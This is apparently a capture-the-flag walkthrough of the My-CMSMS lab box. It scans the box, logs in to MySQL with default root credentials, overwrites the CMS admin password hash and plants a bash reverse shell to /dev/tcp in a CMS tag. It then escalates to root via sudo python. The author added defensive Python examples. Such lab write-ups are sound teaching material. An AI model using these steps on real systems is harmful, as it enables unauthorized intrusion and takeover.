PG — My-CMSMS — Walkthrough (Offensive Security Proving Grounds Play Boxes)

caesar
6 min read · Jun 8, 2021

Introduction

This article walks you through the My-CMSMS box, produced by Pankaj Verma and hosted on Offensive Security's Proving Grounds Labs. Anyone with access to Vulnhub or Offensive Security's Proving Grounds Play or Practice can try to pwn this Linux box; it is an intermediate and fun box. Hope you enjoy reading the walkthrough!

Reconnaissance

As we are already provided with the IP address of the box, we will scan it with Nmap.

Scanning

We scan the IP for all open ports by typing the following command in our terminal.

nmap -p- 192.168.x.x

After waiting a while, we get our results as shown below:

Nmap Port Scan

To gather further information on the ports found by nmap, we run it again with more arguments, specifying only the open ports. -sV probes each open port to identify the service and its version, and -sC runs the default NSE scripts against those services, which gather extra details (banners, headers, default pages) and perform a few basic vulnerability checks.

nmap -p 22,80,3306 192.168.x.x -sV -sC

In a short while we get our results with more details on the open ports. We decide to start enumeration on port 80, since port 22 is not a logical starting point: an SSH server does not offer the broad attack surface that an HTTP server does. After that, we will move on to port 3306, the default MySQL port.

Nmap Specified Port Scanning

Enumeration

We open our browser, type the IP address of the box, and come across CMS Made Simple.

Http Enumeration

Since a CMS is installed on the HTTP server, we enumerate further to see if there is a public exploit for it, so we run searchsploit with the CMS name.

Searchsploiting CMS Name

We see that there are a number of public exploits for CMS Made Simple, but most of them are authenticated, which means we need valid credentials to be able to use them.

We will brute-force directories with gobuster to see if there is a useful one.

gobuster dir -u http://192.168.x.x/ -w /usr/share/wordlists/dirb/common.txt -t 5

Directory Bruteforcing

We find two directories, /admin and /phpmyadmin, through which we could get a foothold on the box if default credentials work.

Admin Directory Enumeration

We try default credentials such as admin:admin on the login page in the /admin directory, but they do not work.

Phpmyadmin Enumeration

Default credentials do not work on /phpmyadmin either.

In this case, we also have a MySQL server on port 3306, so we try the default MySQL credentials root:root on it to see if we are able to connect.

mysql -h 192.168.x.x -u root -p

Connecting to Mysql Server

We are able to connect to the MySQL server. Now, let us exploit it.

Exploitation

As we are able to connect to the MySQL server as root, we enumerate the databases and users on the server.

Enumerating MySQL

We switch to cmsms_db to enumerate further and query the users table:

select username,email,password from cms_users;

Enumerating MySQL

There is an admin user on the web server, so we change the admin password with the following command. CMS Made Simple stores a password as the MD5 of the site's sitemask preference concatenated with the password (with an empty string if no sitemask is set), so the UPDATE writes exactly that value:

update cms_users set password = (select md5(CONCAT(IFNULL((SELECT sitepref_value FROM cms_siteprefs WHERE sitepref_name = 'sitemask'), ''), 'caesar'))) where username = 'admin';

Changing Admin Password

We get no warnings, which means the password was changed successfully. Now we log in to the HTTP server with the credentials we just set through MySQL.
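To make the UPDATE statement above less opaque, here is an added example (not code from the walkthrough or from CMS Made Simple itself) that reproduces the same hash construction in Python: MD5 over sitemask + password, with a missing sitemask treated as an empty string, just like the IFNULL in the SQL. The sitemask value is a constructed placeholder, since the box's real one is not shown. The point for a defender is that this is a fast, unsalted-per-user hash, so anyone who can write to cms_users (here, via MySQL with default root credentials) can set it to whatever they like, and anyone who can read it can brute-force it offline; the exposed database is the real finding.

```python
import hashlib
from typing import Optional

# Added example, not part of the walkthrough: how CMS Made Simple derives the
# stored admin password hash, so the UPDATE statement's effect can be checked.

def cmsms_password_hash(sitemask: Optional[str], password: str) -> str:
    """Hex MD5 of sitemask + password; a missing (NULL) sitemask counts as ''."""
    return hashlib.md5(((sitemask or "") + password).encode("utf-8")).hexdigest()

def verify_password(stored_hash: str, sitemask: Optional[str], candidate: str) -> bool:
    """Recompute the hash for a login attempt and compare it with the stored value."""
    return cmsms_password_hash(sitemask, candidate) == stored_hash.lower()

# Constructed sample values (the box's real sitemask is not reproduced here).
SAMPLE_SITEMASK = "example-sitemask"

if __name__ == "__main__":
    stored = cmsms_password_hash(SAMPLE_SITEMASK, "caesar")
    print("stored hash:", stored)
    print("login with 'caesar' succeeds:", verify_password(stored, SAMPLE_SITEMASK, "caesar"))
    print("login with 'wrong' succeeds:", verify_password(stored, SAMPLE_SITEMASK, "wrong"))
```

With the sitemask set to NULL the hash collapses to a plain MD5 of the password, which is what the IFNULL fallback in the SQL covers.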

Dashboard of CMS Made Simple

After a little googling, we learn that we can execute commands on the server as follows:

Command Execution on the Server

We click Extensions, then User Defined Tags, and edit the user_agent tag so that it executes commands on the server.

System Command Execution

We write the following command into the tag in order to get a reverse shell.

system("bash -c 'bash -i >& /dev/tcp/192.168.x.x/443 0>&1'");

Now we set up a netcat listener on port 443.

Setting up Netcat Listener

Then we curl the page where we submitted our command, which makes the tag run.

curl -vv http://192.168.x.x/index.php?page=user-defined-tags

Curling the Link to Execute Command

Let us check our netcat listener to see if our command executed on the server.

Getting a Reverse Shell

And we have a shell on the server. Now it is time to get the low-privilege shell hash.

Low Shell Hash

Privilege Escalation

We enumerate the machine for weak services and files.

Enumerating Files and Services

And we discover a .htpasswd file in the /var/www/html/admin directory, which contains base64 text.

Enumerating Files and Services

We decode the base64 text on our attacking box to see what it is.

Decoding Base64 Text

We decode it and find another string, this time encoded in base32. We decode that as well and get a username and a password.
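The two-step decode described above, as an added example (not code from the walkthrough): the function peels base64 and base32 layers off a string until plain text appears, and splits the result as a user:password pair. The sample value is constructed by encoding a placeholder password the same way the file on the box was encoded; the real password is not reproduced. It illustrates why "encoding" a credential in a web-readable file is no protection at all: the plaintext comes back without any key.

```python
import base64
import binascii
import re

# Added example, not part of the walkthrough: peel nested base64/base32 layers.
# Each candidate layer is (name, alphabet check, decoder). Base32 is tried first,
# because its alphabet (A-Z, 2-7, '=') is also valid base64 text.
CANDIDATES = [
    ("base32", re.compile(r"^[A-Z2-7]+={0,6}$"), base64.b32decode),
    ("base64", re.compile(r"^[A-Za-z0-9+/]+={0,2}$"),
     lambda s: base64.b64decode(s, validate=True)),
]

def _try_decode(decoder, text):
    """Decode with `decoder`; accept the result only if it is printable ASCII."""
    try:
        out = decoder(text).decode("ascii")
    except (binascii.Error, UnicodeDecodeError, ValueError):
        return None
    return out if out.isprintable() else None

def peel_encodings(blob: str, max_layers: int = 5):
    """Strip successive base32/base64 layers; return (plaintext, [layer names])."""
    current, layers = blob.strip(), []
    for _ in range(max_layers):
        for name, alphabet, decoder in CANDIDATES:
            if alphabet.match(current):
                decoded = _try_decode(decoder, current)
                if decoded is not None:
                    layers.append(name)
                    current = decoded
                    break
        else:
            break  # no layer decoded cleanly: this is the plaintext
    return current, layers

def split_credential(text: str):
    """Split a 'user:password' pair, the form an .htpasswd entry takes."""
    user, _, password = text.partition(":")
    return user, password

# Constructed sample: base64(base32("user:password")), the same layering the
# walkthrough found. The password here is a placeholder, not the box's real one.
SAMPLE_HTPASSWD_VALUE = base64.b64encode(
    base64.b32encode(b"armour:ExamplePass123")).decode("ascii")

if __name__ == "__main__":
    plaintext, layers = peel_encodings(SAMPLE_HTPASSWD_VALUE)
    print("layers removed:", layers)
    print("credential:", split_credential(plaintext))
```

The alphabet checks only pick which decoders are worth trying; the printable-ASCII test is what decides that a layer was really there, so a plain word that happens to be valid base64 is left alone.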

We try to log in as the armour user over SSH, but we are not allowed to log in.

SSH Server Login Attempt

Since SSH login is not allowed, we switch to the armour user on the shell we already have, and then upgrade it to a TTY shell.

Login to Armour User and Getting TTY Shell

Now we check the sudo permissions of the current user by typing sudo -l in the terminal, and we see that we can run python with root privileges.

Enumerating for Privilege Escalation

So we prefix the same python command we used to get a TTY shell with sudo. Because python now runs as root, the shell it spawns is a root shell.

sudo /usr/bin/python -c 'import pty;pty.spawn("/bin/bash")'
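The sudo -l check and the python escalation above show the general problem: a sudo rule that lets a user run an interpreter or editor as root is a root shell in disguise. As an added example (not code from the walkthrough), the audit below parses sudo -l style output and flags such rules, which is what an administrator reviewing this box should have caught. The sample output is constructed to resemble the rule found on the box; the hostname, Defaults entries and the extra rules are assumptions.

```python
import re

# Added example, not part of the walkthrough: flag `sudo -l` rules that grant a
# program able to spawn a shell or run arbitrary code, as /usr/bin/python does.

# Programs that can directly spawn an interactive shell or execute arbitrary code.
SHELL_CAPABLE = {
    "python", "python2", "python3", "perl", "ruby", "php", "node",
    "bash", "sh", "dash", "zsh", "vim", "vi", "less", "more",
}

# One sudo rule line: "(runas) [TAG: ...] cmd1, cmd2"
RULE_RE = re.compile(r"^\s*\((?P<runas>[^)]*)\)\s*(?P<tags>(?:[A-Z]+:\s*)*)(?P<cmds>.+)$")

def risky_sudo_entries(sudo_l_output: str):
    """Return (command, run-as, passwordless?) for every rule granting a shell-capable program."""
    findings = []
    for line in sudo_l_output.splitlines():
        m = RULE_RE.match(line)
        if not m:
            continue  # header text such as "User armour may run..." is not a rule
        runas = m.group("runas").strip()
        nopasswd = "NOPASSWD" in m.group("tags")
        for cmd in m.group("cmds").split(","):
            cmd = cmd.strip()
            if not cmd:
                continue
            basename = cmd.split()[0].rsplit("/", 1)[-1]
            if cmd == "ALL" or basename in SHELL_CAPABLE:
                findings.append((cmd, runas, nopasswd))
    return findings

# Constructed sample modelled on the `sudo -l` output seen on the box; only the
# python rule reflects the walkthrough, the rest is invented for contrast.
SAMPLE_SUDO_L = """\
Matching Defaults entries for armour on this host:
    env_reset, mail_badpass

User armour may run the following commands on this host:
    (root) NOPASSWD: /usr/bin/python
    (root) /usr/bin/apt-get update
    (ALL : ALL) NOPASSWD: /usr/bin/vim, /usr/bin/tar
"""

if __name__ == "__main__":
    for cmd, runas, nopw in risky_sudo_entries(SAMPLE_SUDO_L):
        print(f"risky rule: {cmd} as ({runas}){' without a password' if nopw else ''}")
```

The fix on the defender's side is to grant sudo only for specific, non-interactive commands with fixed arguments, never for interpreters, editors or pagers, and to review sudoers with visudo -c after every change.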

Python Privilege Escalation

And we get the root hash.

Getting Root Hash

Now we have full control of the box. Enjoy!
